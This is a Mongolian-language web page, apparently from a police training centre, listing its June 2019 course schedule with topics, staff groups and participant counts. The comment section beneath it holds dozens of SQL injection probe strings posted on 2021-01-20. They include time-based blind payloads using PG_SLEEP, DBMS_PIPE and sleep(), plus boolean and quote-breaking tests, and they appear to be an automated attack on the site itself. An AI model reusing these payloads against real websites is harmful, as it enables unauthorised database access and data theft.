• Нүүр хуудас
  • Холбоо барих
  • Асуулт хариулт
  • Иргэний хяналт

2019 оны 06 дугаар сард зохион байгуулагдах төлөвлөгөөт сургалтын хуваарь

2019-05-24

2019.05.10

Улаанбаатар хот

 

Сургалтын сэдэв

Хамрагдах алба хаагч

Сургалтад хамрагдах хугацаа /хоног/

                                                   6 дугаар  сард

2019 оны 6 дугаар сарын 03-ны өдрөөс 07-ны өдөр хүртэл

2019 оны 6 дугаар сарын 10-ны өдрөөс 14-ний

өдөр хүртэл

2019 оны 6 дугаар сарын 17-ны өдрөөс 21-ний

өдөр хүртэл

2019 оны 6 дугаар сарын 24-ний өдрөөс 28-ны өдөр хүртэл

Нэг. Удирдах ажилтныг чадавхжуулах чиглэлээр

1

Удирдах ажилтны сэтгэл зүй

 

30

 

2

 

Хэлтсийн дарга нар

 

 

Хоёр. Гэмт хэрэгтэй тэмцэх чиглэлээр

2

Цахим, мэдээллийн аюулгүй байдлын эсрэг гэмт хэргийг илрүүлэх, арга тактик

30

3

 

 

Мөрдөгч, эрүүгийн мөрдөгч нар

/1-3 жил ажилласан/

 

3

Хүрээлэн байгаа орчны эсрэг гэмт хэргийн газрын үзлэг хийх, илрүүлэх арга, тактик

30

3

 

Мөрдөгч, эрүүгийн мөрдөгч нар

/1-3 жил ажилласан/

 

 

Гурав. Мэдээлэл, дүн шинжилгээ, шуурхай удирдлагын албаны сургалт

4

Мэдээлэл судалгааны ажилтны сургалт

30

3

Мэдээлэл судалгааны ажилтан нар

 

 

 

Дөрөв. Хүний хөгжлийн сургалт /ур чадвар ахиулах/

5

Санхүү аж ахуйн ажилтны сургалт

 

30

3

 

 

Нягтлан бодогч, тооцооны нягтлан, нярав

 

6

Хөдөлмөрийн аюулгүй байдал эрүүл ахуйн ажилтан бэлтгэх давтан сургалт

 

45

3

ХАБЭА-ны сургалтад хамрагдсан алба хаагчид

 

 

 

Тав.  Улаанбаатар  Цагдаагийн хүрээний алба хаагчдад

чиглэсэн сургалт  

7

Хууль зүй, дотоод хэргийн сайдын 2017 оны А/145 дугаар тушаалын хавсралтаар батлагдсан “Цагдаагийн алба хаагчийн биеийн хүч, тусгай техник, хэрэгсэл, галт зэвсэг хэрэглэх бэлтгэл хангах” мэргэшүүлэх  сургалт

 

800

 

12

Алба хаагчид

 

        Долоо. Хууль тогтоомжид заасны дагуу зохион

 байгуулагдах сургалт

8

Иргэдэд зориулсан галт зэвсгийн сургалт

60

4

 

 

Иргэд

Нийт

1055

33

Нийт -8 сургалт

                 

 

 

       ЦАГДАА,  ДОТООДЫН ЦЭРГИЙН СУРГАЛТЫН

              НЭГДСЭН ТӨВ

 

ncMUFCMU @@tIHGn
2021-01-20 Хариулах
ncMUFCMU '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
2021-01-20 Хариулах
ncMUFCMU 1'"
2021-01-20 Хариулах
ncMUFCMU 1����%2527%2522
2021-01-20 Хариулах
ncMUFCMU *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
2021-01-20 Хариулах
ncMUFCMU qxtyIGEH')) OR 234=(SELECT 234 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU qhnW3Yx7') OR 355=(SELECT 355 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU SDOx9qo6' OR 964=(SELECT 964 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU -1)) OR 917=(SELECT 917 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU -5) OR 175=(SELECT 175 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU -5 OR 731=(SELECT 731 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
2021-01-20 Хариулах
ncMUFCMU 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
2021-01-20 Хариулах
ncMUFCMU if(now()=sysdate(),sleep(15),0)
2021-01-20 Хариулах
ncMUFCMU 1*
2021-01-20 Хариулах
ncMUFCMU 1*
2021-01-20 Хариулах
ncMUFCMU -1 OR 2+658-658-1=0+0+0+1
2021-01-20 Хариулах
ncMUFCMU -1 OR 3+658-658-1=0+0+0+1
2021-01-20 Хариулах
ncMUFCMU RLIKE (SELECT (CASE WHEN (404=404) THEN 1 ELSE 0x28 END)) --
2021-01-20 Хариулах
ncMUFCMU QgfTCrTM
2021-01-20 Хариулах
ncMUFCMU 1*
2021-01-20 Хариулах
ncMUFCMU 1*
2021-01-20 Хариулах
ncMUFCMU 1����%2527%2522
2021-01-20 Хариулах
ncMUFCMU @@e48So
2021-01-20 Хариулах
ncMUFCMU '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
2021-01-20 Хариулах
ncMUFCMU 1'"
2021-01-20 Хариулах
ncMUFCMU *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
2021-01-20 Хариулах
ncMUFCMU SUUdhH6e')) OR 956=(SELECT 956 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU 8APdHxxF') OR 523=(SELECT 523 FROM PG_SLEEP(15))--
2021-01-20 Хариулах
ncMUFCMU g5eOO6vy' OR 709=(SELECT 709 FROM PG_SLEEP(15))--
2021-01-20 Хариулах